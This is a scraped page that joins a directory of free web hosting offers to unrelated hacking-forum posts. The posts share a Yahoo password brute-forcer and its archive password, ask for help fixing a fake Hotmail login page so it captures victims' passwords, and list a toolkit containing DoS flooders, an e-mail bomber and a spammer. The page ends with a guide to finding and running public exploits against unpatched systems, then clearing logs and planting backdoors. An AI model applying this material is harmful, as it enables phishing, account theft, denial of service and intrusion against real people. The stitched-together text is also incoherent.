Cafe 150
banner supported web hosting with 10GB bandwith, 350MB storage space and MySQL+PHP support. broken link?Comments
CompHost.info
300 MB of web space, 10 GB monthly transfer, PHP, MySQL, FTP, Scriptinstaller and Vista Panel. broken link?Comments
DJ Cafe
free web hosting for the music community. 5 MB to start (can be increased up to 150 MB), guestbook, forum/message board, counter, feedback forms, FrontPage 98 extensions, Real Audio server, server side includes, custom CGI scripts. Address like yourname.djcafe.com. Maximum file size 500 Kb. broken link?Comments
Domain DLX
web hosting offering 100MB disk space, web-based FTP and control panel, 1GB monthly bandwidth, online unzip zapability , SSI and Active Server Pages support, plus free MS access database connectivity. broken link?Comments
Dreamwater
10 MB free web hosting (and more if you need it), guestbook, chat board, form mailer, web page builder, web page templates, free clip art. Address like dreamwter.com/yourname. Unlimited bandwith. broken link?Comments
eHostix
free hosting with php/mysql support. broken link?Comments
eSmartStart
250 MB web space, web based file manager, FTP access. broken link?Comments
Fasthoster
300 MB disk space, 10 GB monthly transfer, 7 MySQl databases, FTP, free subdomain, file manager. broken link?Comments
FBHosting
free web hosting with 50MB web storage, 1000MB monthly transfer, PHP support, FTP allowed and online file manager. Address like yourname.fbhosting.com broken link?Comments
FinalHosting.info
free hosting plan offers with 250MB web space, 6GB monthly bandwith, MySQL/PHP5, Zend, Ioncube support. broken link?Comments
FragVault
free web hosting on servers based in the US. Minimum of 300MB of storage and 35GB of monthly transfer to the end user. Also supports cPanel, PHP, MySQL, IMAP/SMTP/POP e-mail, domain forwardning, add on domains, and sub domains. broken link?Comments 1
Free global host
free web host with 300 MB webspace, 8GB/month bandwith, 29 automatic installer scripts, FTP access, 3MySQL databases, file manager. broken link?Comments
Free Host Place
free website hosting with no annoying ads on your site. 5GB space, 20GB bandwidth, 10 MySQL databases, PHP scripting. broken link?Comments
Free Hyper Space
1000MB free web host with free subdomain and FTP, MySQL, PHP support. 10GB monthly bandwith. broken link?Comments 30
Free-Biz-Hosting
free webhosting for business start-ups on my own own business server. Fully featured Unix hosting cPanel with Fantastico deluxe. PHP, Perl, cgi-bin, cron... the lot! broken link?Comments
Free100Megs.com
simple free web hosting. broken link?Comments
Freebie Host
free web hosting for personal or business. PHP and MySQL support. Instant activation, 2GB Disk Space, 10Gb bandwidth, PHP Script autoinstallers. broken link?Comments
FreeHomePage.com
free hosting package includes 50MB of disk space, 1GB of monthly bandwidth, site templates and scripts. broken link?Comments
Freehostingx
free 300 MB space, 10 GB of transfer, free sub-domain, email, php 5 support and more. broken link?Comments
FreeHosty
free web hosting with 300 MB disk space , 10 GB monthly transfer, Vista panel, web mail, PHP flags manager, POP email accounts, 7 MySQL databases, automatic installer (29 scripts), password protected folders, 5 add-on domains, FTP account, Php MyAdmin, 5 sub domains and file manager (browser upload). broken link?Comments
Freehostzoo
free web host that gives you a 5 gigs of space, easy to use control panel, no ads, instant activation, PHP, FTP, MySQL databases, use your own domain or our free subdomains and more. broken link?Comments 1
FreeServers
12MB of web space, file manager (no FTP), web site builder. broken link?Comments 1
FreeSiteWebHosting.cc
300 MB web space, 10 GB transfer, 7 MySQL databases, vista panel, automatic script installer, FTP, subdomains, and more. broken link?Comments
Freespaces
free web hosting with unlimited disk space, no hits limit, address like yoourname.freesapces.com and FPT access. broken link?Comments 1
FreewayWebhost
100MB space, 1 GB bandwidth, domain hosting, FTP, ad supported. broken link?Comments
Freewebs
40 MB free web hosting, 500 MB monthly bandwith, support for FTP, SSI, password protection, address like www.freewebs.com/yourname broken link?Comments 1
Frihost
free web hosting with 250MB space, 10 GB of traffic each and every month, PHP, Perl and MySQL support, no forced advertisements. You have to be active forum member. broken link?Comments
Geocities
one of the oldes free web hosting services. 15 MB space for storing files, 3 GB / month bandwith, address like www.geocities.com/yourname. Advertising supported. broken link?Comments
GnuFHC
free web hosting with no restriction's, plus free e-mail with POP3 access. broken link?Comments
GoFreeServe
free hosting that supports php and MySQL databases. Vistapanel provides a portal for easy management of your website including 300MB web space, 10 GB monthly data transfer, FTP and automatic script installer. broken link?Comments
HeadshotHost
another free host with 300MB space and 12GB bandwith. PHP5/MySQL supported. broken link?Comments
Host Department
100 MB free web hosting, unlimited bandwith, pre-installed scripts (guestbook, forum, forms), support for password protection, web site generation tool, statistics. broken link?Comments
Host-ed
free web host with 1GB of diskspace and 20GB of bandwith. PHP and mySQL supported. broken link?Comments
Host4Free.biz
free web host with 2000MB space and 10000MB monthly bandwidth. MySQL and PHP5 support. broken link?Comments
Hostff.net
free web host, 250 MB disk space, 6 GB monthly transfer, POP email accounts, 3 MySQL databases, automatic installer (29 scripts), password protected folders, FTP account. broken link?Comments
HostFree4Life
free web hosting service that offers 100 megs of storage and 5,000 megs of bandwidth per month. Features PHP and MySQL support, FTP access, and more. broken link?Comments
Hosting For Hobbies
free PHP web hosting for your hobby. Host your blog, forum or web site about your hobby for free. 250 MB disk space, 6GB Monthly Bandwidth, FTP account and more. broken link?Comments
Hostrea
free web hosting with PHP5 and Mysql. Script installer with 29 scripts like wordpress, joomla, phpbb and many more. 250mb of space and a free sub-domain. You can host 5 addon domains and 5 subdomains. broken link?Comments
HostWQ
300MB web space, 10GB bandwidth, 5 Add-on domains, 5 sub-domains, web mail, POP email, FTP account, PHP MyAdmin, PHP flags manager, automatic script installer, vista panel. broken link?Comments
Ironhost.0lx.net
150Mb of disk space, 4Gb of bandwidth, 2 MySQL databases, 5 Add-on domains, 5 Sub domains, Vista Panel, PHP Flags manager, POP email accounts. broken link?Comments
iziHost
250MB free webspace for the novice and advanced user. 5GB traffic a month, 3 SQL Databases, ControlPanel, Script deployer, and full support by a professional staff. broken link?Comments
Kwebserv
free hosting with 250 MB disk space, 6 GB monthly transfer, 3 MySQL databases, FTP account, POP email, PHP MyAdmin. broken link?Comments 2
Magic runhosting
150MB free web hosting with 4GB transfer as well as traffic statistics, MySQL databases, PHP, Perl, CGI, SSI and POP3. broken link?Comments
Memebot
free website, weblog or wiki hosting. No ads on your pages. CGI, .htaccess, email and dns support. Your website must be smaller than 30MB disk, and your bandwidth less than 100MB/month. broken link?Comments 1
Metrohosting
free hosting with 300 MB disk space, 3 MySQL databases, PHP support, FTP account, WebMail, POP3 support and PHP MyAdmin. broken link?Comments 2
Mfwp.info
free web hosting with 300 MB, 10GB transfer, Mysql + PHP support and FTP access. broken link?Comments
Mhahost
free web host with 300 MB disk space, 10 GB Monthly transfer, POP email accounts, 7 MySQL databases, automatic installer (29 scripts), FTP account. broken link?Comments
Mickle Muckle
free web host offering 300MB disk space, 10GB monthly bandwith, PHP, MySQL databases, FTP and automatic script installer (like Fantastico). broken link?Comments
Midnighthost
web host with 300MB webspace, 8GB bandwidthb great customer support, vista panel, 6 MySQL databases. broken link?Comments
MujWeb
Czech hosting server. 15 MB space for static pages only, address like www.mujweb.cz/www/yourname. broken link?Comments
My Place
free web hosting plan with 350 MB space, 60 GB traffic, MySQL database, FTP account, POP3 email account. 468 x 60 banner at the top of page. Instant activation. broken link?Comments 1
My-Php
300mb web space, 100gb transfer, no ads or forum posts. broken link?Comments 1
My-realm
free 300 MB disk space, 8 GB monthly transfer, 5 MySQL databases, 5 add-on domains, 5 sub domains, automatic installer (29 scripts, FTP account, File manager (browser upload), POP email accounts and Php MyAdmin. Accounts are activated instantly. broken link?Comments 2
My3gb
offers 3gb of free web space with 30gb bandwidth. You will be able to use PHP scripting, MySQL and full FTP access. broken link?Comments
MyCyberWay
free webhost with 500MB web space, 5000MB traffic, PHP support and PhpMyAdmin access, 3 MySQL databases, FTP access. broken link?Comments
MyHosting247.com
main features are: 5GB of free webspace, 20GB of bandwidth, 20 MySQL databases, PhpMyAdmin, FTP access, PHP hosting, file manager, host your own domain or subdomain. broken link?Comments
Net 4 free
150MB free web space, FTP access, instant activation, unlimited bandwidth/hits, 500 KB file size limit. broken link?Comments 1
NetFast
free web hosting with 200MB webspace, 100GB bandwidth, PHP, MySQL and POP3 email account. Instant activation. broken link?Comments
New Hosting Place
free web hosting for personal or business. All accounts have 5GB space, 20GB bandwidth, 10 MySQL Databases, PHP scripting. broken link?Comments
OneCoolHost
free web hosting, 100mb space, 1gb bandwidth, free promotional tools, and site builder. Ad supported. broken link?Comments
OurFreeWebHost
free web host with 20000MB space, 10000MB bandwith, PHP/MySQL support and auto installed applications. broken link?Comments
OuterRimHosting.com
200MB disk space, 2000MB transfer/month, PHP, CGI, cpanel, all accounts are instantly activated after email verification. broken link?Comments
Pandela
they offer 3 free web hosting plans: 100MB space+3GB bandwith, 150MB space+2GB bandwith and 50MB space+4GB bandwith. All three plans comes with POP3 account, SSI, PHP, Perl and MySQL support. broken link?Comments
Pawebhosting
free web hosting on servers based in the US. 150MB of storage and 5000MB of monthly transfer. Also supports PHP/MySQL. broken link?Comments
PhP 4 Me
free web site hosting. 300mb of space, 10 gb of bandwith, php, mysql, email, control panel, your domain-name or use a free sub-domain. broken link?Comments
Php0h.com
200MB PHP enabled webspace, unlimited data transfer, 1 MySQL database, 1 FTP account, POP email address, http://username.php0h.com address, instant activation. They force a 468 x 60 text banner to the top of all pages. broken link?Comments
PhpNet.us
free web hosting with 300 MB web space, 6 GB monthly traffic, PHP scripting support, MySQL database, no file size restrictions and POP3 email support. broken link?Comments 2
Pink Paper
free website hosting that gives you 300 MB of disk space, 10 GB monthly bandwidth, automatic script installer, 7 MySQL databases, PHP 5 support, POP and Web based email accounts. broken link?Comments
Profuse Host
this free web hosting package will give you 1GB of space (100GB monthly traffic)plus the advanced options like php, mysql database, frontpage extension, web mail, ftp accounts and more. broken link?Comments 3
Prohosting
free web hosting with 100 MB storage, 1.2 GB monthly bandwith, site builder and FTP support. broken link?Comments
Prohosts
300mb web space and 30gb transfer all for no ads or forum posts. No waiting time, instant activation. broken link?Comments
Quotaless
virtually unlimited hosting with MySQL and PHP support. Runhost
free web hosting service with 250MB disk space, 20Gb bandwith, PHP, MySQL, FTP access and instant activation. RycoHost
free web hosting company that offers 300 MB disk space, 10 GB Monthly transfer, 7 MySQL databases, 5 Add-on domains, 5 Sub domains, Vista Panel control panel, Web mail, PHP flags manager, POP email accounts, Password protected folders, FTP account, Php MyAdmin and File manager. broken link?Comments
Sevent.net
free PHP and mySQL cpanel hosting with email, 250MB disk space, 6000MB bandwidth, 5 addon domain, 5 subdomains and FTP support

Yahoo Forcer

A power full Yahoo broute Forcer Which Dr: placed In tool section http://drhack.sytes.net/Default.aspx?tabid=66

that brout forcer required serial key for extraction
u see when u extract it i asks for serial key {or password}

The serial key{or password IS}

"RUBENRED" [wid out invited comas]

but i know that forcer is little currepted

wait while i get real copy of that forcer

i am In touch Wid it's auther

Just wait
thanX

fake msn login page

downloaded a software from http://www.elitec0ders.net/HotmailGen.zip

its a fake hotmail login page
and then i uploaded it to a host
it looks like the real one
but the problem is its not sending me victims password

in that software's readme file its mentioned dont forget to edit the source of fake login page
i dont know html that much

so can anyone of u (specially prime hacker dr hack nicotine or nokia) tell me where do i have to edit in fake hotmail page to make it work correctly

u can see my fake msn page : http://attachment.t35.com/site.html

illegal id creatro for yahoo

Quote:

http://rapidshare.com/files/972673/illigle_id_creater.zip.html

Net Tools 5


Net Tools is cutting-edge security and network monitoring software for the Internet and Local Area Networks, providing clients with the ability and confidence to meet the challenges of tomorrow's technology. Keeping pace with the industry trends, we offer professional tools that support the latest standards, protocols, software, and hardware for both wired and wireless networks. The main goal is the creation of high quality software. Net Tools is a very strong combination of network scanning, security, file, system, and administrator tools useful in diagnosing networks and monitoring your PC and computer's network connections for system administrators. Next to the essential core tools it includes a lot of extra valuable features. It’s a Swiss Army knife for everyone interested in a set of powerful network tools for everyday use. This all-in-one toolkit includes also a lot of handy file and system utilities next to the huge amount of network tools. The menus are fully configurable, so in this way you won’t get lost in the extremely large amount of essential tools. All the additional features will make this application a must have for all system administrators. There are numerous constructive and valuable applications included in Net Tools that can be used for a great amount of purposes. The latest version of Net Tools is hybrid; it means that it’s capable of working together with applications that are made and designed for Net Tools, so in this way more flexibility and user-friendliness is obtained. This software is designed for the Microsoft Windows OS (Windows 98, NT, 2000, 2003, XP, Vista). It’s entirely compatible and has thoroughly been tested on Windows XP. With the 175+ tools it is a great collection of useful tools for network users. The size of Net Tools 5.0.70 is approximately 25 Mb.

Contents
Net Tools 5.0 (build 70) contains a whole variety of network tools. Here is a list of the most important tools:

1) IP Address Scanner
2) IP Calculator
3) IP Converter
4) Port Listener
5) Port Scanner
6) Ping
7) NetStat (2 ways)
8) Trace Route (2 ways)
9) TCP/IP Configuration
10) Online - Offline Checker
11) Resolve Host & IP
12) Time Sync
13) Whois & MX Lookup
14) Connect0r
15) Connection Analysator and protector
16) Net Sender
17) E-mail seeker
18) Net Pager
19) Active and Passive port scanner
20) Spoofer
21) Hack Trapper
22) HTTP flooder (DoS)
23) Mass Website Visiter
24) Advanced Port Scanner
25) Trojan Hunter (Multi IP)
26) Port Connecter Tool
27) Advanced Spoofer
28) Advanced Anonymous E-mailer
29) Simple Anonymous E-mailer
30) Anonymous E-mailer with Attachment Support
31) Mass E-mailer
32) E-mail Bomber
33) E-mail Spoofer
34) Simple Port Scanner (fast)
35) Advanced Netstat Monitoring
36) X Pinger
37) Web Page Scanner
38) Fast Port Scanner
39) Deep Port Scanner
40) Fastest Host Scanner (UDP)
41) Get Header
42) Open Port Scanner
43) Multi Port Scanner
44) HTTP scanner (Open port 80 subnet scanner)
45) Multi Ping for Cisco Routers
46) TCP Packet Sniffer
47) UDP flooder
48) Resolve and Ping
49) Multi IP ping
50) File Dependency Sniffer
51) EXE-joiner (bind 2 files)
52) Encrypter
53) Advanced Encryption
54) File Difference Engine
55) File Comparasion
56) Mass File Renamer
57) Add Bytes to EXE
58) Variable Encryption
59) Simple File Encryption
60) ASCII to Binary (and Binary to ASCII)
61) Enigma
62) Password Unmasker
63) Credit Card Number Validate and Generate
64) Create Local HTTP Server
65) eXtreme UDP Flooder
66) Web Server Scanner
67) Force Reboot
68) Webpage Info Seeker
69) Bouncer
70) Advanced Packet Sniffer
71) IRC server creater
72) Connection Tester
73) Fake Mail Sender
74) Bandwidth Monitor
75) Remote Desktop Protocol Scanner
76) MX Query
77) Messenger Packet Sniffer
78) API Spy
79) DHCP Restart
80) File Merger
81) E-mail Extractor (crawler / harvester bot)
82) Open FTP Scanner
83) Advanced System Locker
84) Advanced System Information
85) CPU Monitor
86) Windows Startup Manager
87) Process Checker
88) IP String Collecter
89) Mass Auto-Emailer (Database mailer; Spammer)
90) Central Server (Base Server; Echo Server; Time Server; Telnet Server; HTTP Server; FTP Server)
91) Fishing Port Scanner (with named ports)
92) Mouse Record / Play Automation (Macro Tool)
93) Internet / LAN Messenger Chat (Server + Client)
94) Timer Shutdown/Restart/Log Off/Hibernate/Suspend/ Control
95) Hash MD5 Checker
96) Port Connect - Listen tool
97) Internet MAC Address Scanner (Multiple IP)
98) Connection Manager / Monitor
99) Direct Peer Connecter (Send/Receive files + chat)
100) Force Application Termination (against Viruses and Spyware)
101) Easy and Fast Screenshot Maker (also Web Hex Color Picker)
102) COM Detect and Test
103) Create Virtual Drives
104) URL Encoder
105) WEP/WPA Key Generator
106) Sniffer.NET
107) File Shredder
108) Local Access Enumerater
109) Steganographer (Art of hiding secret data in pictures)
110) Subnet Calculater
111) Domain to IP (DNS)
112) Get SNMP Variables
113) Internet Explorer Password Revealer
114) Advanced Multi Port Scanner
115) Port Identification List (+port scanner)
116) Get Quick Net Info
117) Get Remote MAC Address
118) Share Add
119) Net Wanderer
120) WhoIs Console
121) Cookies Analyser
122) Hide Secret Data In Files
123) Packet Generator
124) Secure File Splitting
125) My File Protection (Password Protect Files, File Injections)
126) Dynamic Switch Port Mapper
127) Internet Logger (Log URL)
128) Get Whois Servers
129) File Split&Merge
130) Hide Drive
131) Extract E-mails from Documents
132) Net Tools Mini (Client/Server, Scan, ICMP, Net Statistics, Interactive, Raw Packets, DNS, Whois, ARP, Computer's IP, Wake On LAN)
133) Hook Spy
134) Software Uninstaller
135) Tweak & Clean XP
136) Steganographic Random Byte Encryption
137) NetTools Notepad (encrypt your sensitive data)
138) File Encrypter/Decrypter
139) Quick Proxy Server
140) Connection Redirector (HTTP, IRC, ... All protocols supported)
141) Local E-mail Extractor
142) Recursive E-mail Extractor
143) Outlook Express E-mail Extractor
144) Telnet Client
145) Fast Ip Catcher
146) Monitor Host IP
147) FreeMAC (MAC Address Editor)
148) QuickFTP Server (+user accounts support)
149) NetTools Macro Recorder/Player (Keybord and Mouse Hook)
150) Network Protocol Analyzer
151) Steganographic Tools (Picture, Sounds, ZIP Compression and Misc Methods)
152) WebMirror (Website Ripper)
153) GeoLocate IP
154) Google PageRank Calculator
155) Google Link Crawler (Web Result Grabber)
156) Network Adapter Binder
157) Remote LAN PC Lister
158) Fast Sinusoidal Encryption
159) Software Scanner
160) Fast FTP Client
161) Network Traffic Analysis
162) Network Traffic Visualiser
163) Internet Protocol Scanner
164) Net Meter (Bandwidth Traffic Meter)
165) Net Configuration Switcher
166) Advanced System Hardware Info
167) Live System Information
168) Network Profiler
169) Network Browser
170) Quick Website Maker and Web Gallery Creator
171) Remote PC Shutdown
172) Serial Port Terminal
173) Standard Encryptor
174) Tray Minimizer
175) Extra Tools (nmap console & win32 version)



Many extra features and utilities are included in this package!



























Finding And Running Exploits

The easiest way to get inside a system(unpatched) is to run preformed exploits
You do not need to code ,scratch your head ,or experiment
just find exploit ,compile it , run it and you are done

This all sounds so simple but noone never tells how to find and execute an exploit . This guide will help you to do so. how to become a uber script kiddie way ahead the others

Tools u Need :-

1. A C/C++/C# compiler
U can get it from http://www.borland.com or gnu c compiler will do fine

2. Perl
Get perl interpreter from http://www.perl.com

3. Python - rarely needed
but it is not bad to have python interepreter too. http://www.python.com

Many exploits are written in bash programming or shell scripts so you sometimes need a linux/unix as an os to run exploit
also you may wan to get linux/unix as most of the language compilers and interpreters are inbuilt

Other tools:-
Some tools for victims for information gathering like nmap ,hping ,http print ,amap

Finding Exploits using Internet :-
Step 1.
Use nmap to find open ports
Usage nmap

eg .Lets say he is running VNC on port 5900

Step 2:-
Try to do banner grabbing and OS detection
know what kind of services they are running on different ports
telnet to these ports and send some arbitrary commands to do banner grabbing or you could use tools like http print ,amap etc. For OS detection nmap is ok

eg .By Banner grabbing we found that he is running realvnc 4.1

Step 3:-
Now you know the OS ,the service you want to attack
go to milw0rm.com ,securityfocus.com etc. or simply use google to find
Search for the servie
in securityfocus go to vulnerabilities find it using drop down boxes

Many a times securityfocus wont provide with you with exploit code but milw0rm does

Now save the exploit that milw0rm gave us

For eg. milw0rm gave us the exploit for authentication bypass in real VNC 4.1

Step 4:-
Open the exploit the author usually provides you with details of the exploit in either comments or directly when you are execcting the exploit . the objective here is understand how the exploit work

Step 5:-
Compile the exploit
use GNU C compiler or any other compiler that you have . if the exploit is perl coded good for you
you are saved from the hassle of compilation and stuff
you need to directly run it

eg:- gcc exploit.c exploit

Step 6:-
Run the exploit
for c coded exploits
eg :- exploit.exe(windows) or ./exploit (linux)

For perl

eg: /path/to/perl/perl exploit.pl

for linux default is /usr/bin/

Now the exploit may ask you for various options or sometimes you have to provide parameters beforehand like etc. but it varies from exploit to exploit and is usually given in the details at the beginning of the exploit

Step 7:-
Now you have run the exploit you - the exploit may spawn a shell to you to give command line access to the system or do a vnc.dll inject to give reverse vnc access .Whatever, now you have total control over the system . DO not forget to clean the logs ,install backdoor and making everthing look non suspicious

Special Note:- This tutorial is not meant to be a spoon feed guide it is just a overview giving you an idea how to do such things, coz you can write pages on exploits since there are thousands of them (different ) out there